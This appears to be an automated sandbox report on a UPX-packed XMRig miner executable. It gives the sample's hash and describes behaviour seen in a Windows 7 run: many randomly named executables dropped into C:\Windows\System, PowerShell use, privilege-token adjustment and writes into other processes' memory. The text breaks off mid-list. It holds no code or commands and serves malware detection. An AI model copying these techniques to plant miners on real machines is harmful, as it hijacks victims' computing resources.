Malware Analysis Report

2025-04-19 14:54

Sample ID 240523-zqst1agb2t
Target 86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe
SHA256 bfbeecdb88178b825550da9ea18039db9be67fb02435f167a8b17362d8f08dc1
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bfbeecdb88178b825550da9ea18039db9be67fb02435f167a8b17362d8f08dc1

Threat Level: Known bad

The file 86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-23 20:55

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-23 20:55

Reported

2024-05-23 20:58

Platform

win7-20240508-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\XtrSYcZ.exe N/A
N/A N/A C:\Windows\System\xTAGGOe.exe N/A
N/A N/A C:\Windows\System\DBfwJRA.exe N/A
N/A N/A C:\Windows\System\QPlUZvW.exe N/A
N/A N/A C:\Windows\System\xZKVtVe.exe N/A
N/A N/A C:\Windows\System\CppSwOg.exe N/A
N/A N/A C:\Windows\System\zbDmBlO.exe N/A
N/A N/A C:\Windows\System\QyTICoF.exe N/A
N/A N/A C:\Windows\System\MoQhhBb.exe N/A
N/A N/A C:\Windows\System\RkyacgM.exe N/A
N/A N/A C:\Windows\System\CnWrEkP.exe N/A
N/A N/A C:\Windows\System\sgUhosD.exe N/A
N/A N/A C:\Windows\System\tTOWeyA.exe N/A
N/A N/A C:\Windows\System\mIvnzGJ.exe N/A
N/A N/A C:\Windows\System\isMtcYA.exe N/A
N/A N/A C:\Windows\System\UDWXOJH.exe N/A
N/A N/A C:\Windows\System\CDwjHlf.exe N/A
N/A N/A C:\Windows\System\TKtdLsH.exe N/A
N/A N/A C:\Windows\System\ccQojgd.exe N/A
N/A N/A C:\Windows\System\QuuhWIC.exe N/A
N/A N/A C:\Windows\System\Bbxmlzd.exe N/A
N/A N/A C:\Windows\System\BJSUIuI.exe N/A
N/A N/A C:\Windows\System\nTKodnR.exe N/A
N/A N/A C:\Windows\System\SovYnRY.exe N/A
N/A N/A C:\Windows\System\PQAFiiC.exe N/A
N/A N/A C:\Windows\System\xMommvl.exe N/A
N/A N/A C:\Windows\System\dXpRoLz.exe N/A
N/A N/A C:\Windows\System\rbwDEvV.exe N/A
N/A N/A C:\Windows\System\yPWGjbN.exe N/A
N/A N/A C:\Windows\System\JwDKUOE.exe N/A
N/A N/A C:\Windows\System\eBOKlaU.exe N/A
N/A N/A C:\Windows\System\cVrwSps.exe N/A
N/A N/A C:\Windows\System\JioFZSG.exe N/A
N/A N/A C:\Windows\System\NuwZspg.exe N/A
N/A N/A C:\Windows\System\XiJBkAD.exe N/A
N/A N/A C:\Windows\System\fQdAjtx.exe N/A
N/A N/A C:\Windows\System\cIAZjqo.exe N/A
N/A N/A C:\Windows\System\fHMuXgK.exe N/A
N/A N/A C:\Windows\System\MYfdfTP.exe N/A
N/A N/A C:\Windows\System\ijOCHTr.exe N/A
N/A N/A C:\Windows\System\FpfcmVI.exe N/A
N/A N/A C:\Windows\System\dimamJK.exe N/A
N/A N/A C:\Windows\System\tGoGQgL.exe N/A
N/A N/A C:\Windows\System\AwefXxr.exe N/A
N/A N/A C:\Windows\System\BvfoKgP.exe N/A
N/A N/A C:\Windows\System\YKeMXPm.exe N/A
N/A N/A C:\Windows\System\djoPnjl.exe N/A
N/A N/A C:\Windows\System\jsMlOsL.exe N/A
N/A N/A C:\Windows\System\RjDMOus.exe N/A
N/A N/A C:\Windows\System\WuLnhjO.exe N/A
N/A N/A C:\Windows\System\RibNGMc.exe N/A
N/A N/A C:\Windows\System\XERBGpD.exe N/A
N/A N/A C:\Windows\System\DTrRLBX.exe N/A
N/A N/A C:\Windows\System\IifYshQ.exe N/A
N/A N/A C:\Windows\System\ZQGjXSH.exe N/A
N/A N/A C:\Windows\System\PnlPUGp.exe N/A
N/A N/A C:\Windows\System\BuwZjux.exe N/A
N/A N/A C:\Windows\System\upSikDS.exe N/A
N/A N/A C:\Windows\System\bFiAskZ.exe N/A
N/A N/A C:\Windows\System\EjZKbDa.exe N/A
N/A N/A C:\Windows\System\iFMrAnw.exe N/A
N/A N/A C:\Windows\System\bzAIFuI.exe N/A
N/A N/A C:\Windows\System\hXlvAYC.exe N/A
N/A N/A C:\Windows\System\rNEivEM.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\vGSlxzN.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\elzJOJh.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jWVKutR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wsvEYRo.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HDNMDaa.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qwyNepC.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tWpJBaC.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EGBGVIM.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GsvGhLX.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LHFsGAL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SudCBlr.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\upSikDS.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\horaaZH.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RSbraVI.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ttKaAIH.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ggOVkAc.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vqqHKHs.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OzKiOSF.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TfddYMa.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZoKyZHk.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BEMPnDi.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SYePYtf.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NklMyqn.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EVoHEND.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\juWxFQu.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KvzehUB.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yMfPAaL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bLoNemN.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TTPKtRW.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MUXNmcC.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZzNcicj.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wpIQItR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAEYUnn.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bhmWHMf.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NyExodR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tgEZgFh.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\scozkmM.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fMZRkTL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hVYElqO.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KSjfbgE.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RTYfOde.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WacccJL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UWSkzLg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MUYlHgg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lUZYQNi.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xJRuRBv.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CCDWuPr.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\buzrzhh.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YyGxQKR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KniAJyZ.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FqwwHDU.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NUyQGPL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EiaPxWQ.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dNFLGTO.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tYpsJNN.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ArhVSGP.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jcerDzv.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vgAQbYh.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ElIJvyg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GEtUCsY.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRnXosI.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ORgmrNs.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EdPSylH.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SAvKYDZ.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XtrSYcZ.exe
PID 2220 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XtrSYcZ.exe
PID 2220 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XtrSYcZ.exe
PID 2220 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xTAGGOe.exe
PID 2220 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xTAGGOe.exe
PID 2220 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xTAGGOe.exe
PID 2220 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DBfwJRA.exe
PID 2220 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DBfwJRA.exe
PID 2220 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DBfwJRA.exe
PID 2220 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QPlUZvW.exe
